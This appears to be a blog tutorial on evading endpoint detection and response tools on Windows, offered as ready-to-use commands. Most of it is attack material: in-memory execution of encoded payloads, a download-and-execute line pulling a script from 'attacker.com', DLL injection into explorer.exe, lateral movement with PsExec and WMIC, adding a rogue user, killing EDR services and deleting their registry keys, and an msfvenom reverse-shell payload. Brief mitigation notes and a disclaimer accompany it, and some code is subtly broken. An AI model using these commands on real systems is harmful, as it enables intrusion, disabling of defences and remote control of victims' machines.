Bypassing Endpoint Detection and Response (EDR) Solutions: Practical Evasion Techniques with Commands
EDR solutions are designed to monitor and block malicious activities on endpoints by analyzing processes, files, network activity, and other behaviors. However, attackers and penetration testers often seek to bypass these defenses to test the robustness of security systems or simulate real-world attacks. This blog provides in-depth practical techniques with detailed commands you can use directly in testing environments to bypass EDR solutions.
Disclaimer: The methods shared here are intended solely for educational and authorized testing purposes. Unauthorized access or evasion of security systems is illegal.
1. Fileless Malware Using PowerShell
Fileless malware leverages built-in scripting languages like PowerShell to execute malicious payloads in memory without touching the disk, making it challenging for EDRs that monitor files to detect.
Practical Steps & Commands:
- Base64-encoded Payload Execution: One of the simplest ways to execute fileless malware in PowerShell is to use a base64-encoded payload. This way, the payload is decoded in memory and never written to disk.
$encoded_payload = "BASE64_ENCODED_PAYLOAD_HERE"
$decoded_payload = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded_payload))
Invoke-Expression $decoded_payloads- Replace
"BASE64_ENCODED_PAYLOAD_HERE"with your own encoded payload. - This method ensures no files are written to the disk, bypassing file-based detection methods.
2. PowerShell Script to Download and Execute a Payload: Use PowerShell to download a malicious file from a remote server and execute it entirely in memory.
$url = "http://attacker.com/malicious_payload.ps1"
$script = Invoke-WebRequest -Uri $url
Invoke-Expression $script.Content- his command downloads a PowerShell script and executes it in memory, evading file-based EDR defenses.
3. Using WMI for Remote Execution: Windows Management Instrumentation (WMI) allows executing commands or scripts remotely without touching the disk.
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe -EncodedCommand $encoded_payload"- This method leverages WMI to execute the encoded PowerShell command on a remote machine.
Mitigation Strategies:
- Memory Scanning: Advanced EDRs can scan for unusual in-memory activity and flag malicious processes.
- Script Execution Restrictions: Enforce the use of PowerShell Constrained Language Mode or implement Application Control policies.
2. Process Injection via Reflective DLL Injection
Process injection allows attackers to hide malicious code in legitimate running processes, effectively evading detection by EDR systems.
Practical Steps & Commands:
- Reflective DLL Injection Using PowerShell: Reflective DLL injection allows an attacker to inject a DLL into the memory of a target process without writing it to disk. Tools like ReflectiveInjector can be used for this.
Add-Type -Path "C:\path\to\ReflectiveInjector.dll"
[ReflectiveInjector]::Inject("C:\path\to\payload.dll", "target_process.exe")- This command injects
payload.dllinto thetarget_process.exe(e.g.,explorer.exe).
2. Using PowerShell to Inject a DLL into a Process: PowerShell can also be used for DLL injection through CreateRemoteThread.
$pid = (Get-Process "explorer").Id
$proc = Get-WmiObject -Class Win32_Process -Filter "ProcessId=$pid"
$bytes = [System.Text.Encoding]::UTF8.GetBytes("malicious_payload_here")
$buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length)
[System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $buffer, $bytes.Length)
$proc.CreateRemoteThread(0, 0, 0, $buffer, 0, 0)- This injects your payload into a running process (
explorer.exein this case).
Mitigation Strategies:
- Behavioral Detection: Modern EDR systems detect unusual process behaviors, including code injections into legitimate processes.
- Memory Scanning: Detect the reflective loading of DLLs by scanning process memory.
- API Hooking: Hook critical system APIs like
CreateRemoteThreadto monitor for unusual behavior.
3. Using Living off the Land Binaries (LoLBins)
LoLBins refer to legitimate system binaries and tools that can be used maliciously. EDR solutions often trust these tools, so attackers leverage them for lateral movement and exploitation.
Practical Steps & Commands:
- Using PsExec for Lateral Movement: PsExec is a powerful tool from Sysinternals that allows remote command execution on Windows machines.
PsExec.exe \\targetmachine -u username -p password cmd.exe- This command opens a command prompt on a remote system. You can then execute additional payloads or escalate privileges without triggering file-based detection.
2. Using WMIC for Remote Execution: Windows Management Instrumentation (WMIC) can execute arbitrary commands remotely, making it an excellent choice for stealthy attacks.
wmic /node:"target_ip" /user:"username" /password:"password" process call create "cmd.exe /c malicious_payload.bat"- This command runs a batch file (
malicious_payload.bat) on the remote machine.
3. Using PowerShell to Run LoLBins: PowerShell is often used to invoke LoLBins like cmd.exe, net.exe, powershell.exe, and mshta.exe to perform malicious actions.
Start-Process "cmd.exe" "/c net user attacker /add"- This command adds a new user (
attacker) to the target system usingcmd.exe.
Mitigation Strategies:
- Application Whitelisting: Restrict the execution of trusted system tools to only authorized applications.
- LoLBins Detection: Monitor for suspicious usage patterns of LoLBins and flag them for further investigation.
4. Disabling EDR Agents
Attackers often attempt to disable or tamper with EDR agents themselves, ensuring their malicious activity goes unnoticed.
Practical Steps & Commands:
- Killing EDR Processes: You can use PowerShell or Command Prompt to terminate the EDR agent processes, allowing your payload to run without detection.
Stop-Process -Name "EDRAgent"This stops the EDR agent process (EDRAgent in this example).
taskkill /f /im "EDRAgent.exe"2. Disabling EDR Service via Service Control: You can also stop the EDR agent’s service directly using sc or net commands.
sc stop "EDRAgent"Stop-Service -Name "EDRAgent"- These commands stop the EDR service, disabling protection.
3. Tampering with Registry Keys: Some EDR agents rely on specific registry keys to function. Modifying or deleting these keys can disrupt the EDR’s ability to function properly.
Remove-Item "HKLM:\SOFTWARE\EDRVendor" -Recurse- This command deletes registry entries that might be used by the EDR agent.
Mitigation Strategies:
- Self-Protection: Modern EDR agents use self-protection mechanisms to prevent tampering or termination of their processes.
- Behavioral Detection: Monitor for abnormal process termination or registry modifications.
- Application Control: Prevent unauthorized changes to critical security processes or services.
5. Polymorphic and Metamorphic Malware
Polymorphic and metamorphic malware changes its code each time it is executed, making it difficult for signature-based EDR solutions to detect it.
Practical Steps & Commands:
- Using Metasploit’s
msfvenomfor Polymorphic Payloads:msfvenomallows attackers to generate payloads with multiple encoders, making them polymorphic.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -f exe -o malicious_payload.exe- The
shikata_ga_naiencoder ensures that each payload generated has a different signature.
2. Obfuscating Payloads with Veil-Evasion: Veil-Evasion is a tool that obfuscates payloads, ensuring they bypass antivirus/EDR detection.
python veil-evasion.py- This generates an obfuscated payload that avoids signature-based detection.
Mitigation Strategies:
- Heuristic and Behavioral Detection: Use behavioral analysis and heuristic scanning to detect malicious behavior, even if the signature is obfuscated.
- File Integrity Monitoring: Ensure that all critical system files are regularly scanned for changes, even if the file signature changes.
Conclusion
Bypassing EDR solutions requires a combination of techniques that exploit the limitations of these systems. The commands and techniques described here — fileless malware execution, process injection, LoLBins, EDR termination, and polymorphic malware — are widely used in red teaming and penetration testing engagements to test the resilience of security systems.
While attackers can use these methods to evade detection, defenders should leverage advanced EDR systems with memory scanning, behavioral analysis, and self-protection mechanisms to improve their chances of detecting and mitigating these sophisticated techniques.
Always test and apply these techniques within authorized environments, and remember, ethical hacking is key to improving security systems for everyone.
